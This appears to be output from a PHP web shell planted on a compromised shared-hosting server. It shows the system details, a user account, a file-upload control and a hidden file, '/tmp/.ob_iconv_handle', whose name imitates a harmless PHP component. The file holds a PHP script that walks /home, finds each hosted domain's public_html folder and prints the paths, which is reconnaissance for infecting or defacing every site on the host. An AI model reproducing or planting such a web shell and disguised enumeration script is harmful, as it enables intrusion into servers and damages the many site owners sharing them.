HEX
Server: LiteSpeed
System: Linux jkt09.dewaweb.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: marthati (2073)
PHP: 8.3.31
Disabled: NONE
Upload Files
File: //tmp/.ob_iconv_handle
<?php   $r = "/home"; $dir_public = "public_html"; function is_valid_domain($domain) {     if (!substr_count($domain, '.')) {         return false;     }     if (stripos($domain, 'www.') === 0) {         $domain = substr($domain, 4);     }     $again = 'http://' . $domain;     return filter_var($again, FILTER_VALIDATE_URL); }  $dirs = glob("{$r}/*", GLOB_ONLYDIR); foreach ($dirs as $path) {     $dir = basename($path);     if (is_valid_domain($dir)) {         if (strlen($dir_public)) {             if (is_dir("{$path}/{$dir_public}")) {                 print "<f>{$path}/{$dir_public}@@@{$dir}</f>\n";             }         } else {             print "<f>{$path}@@@{$dir}</f>\n";         }     } } die('!ended!');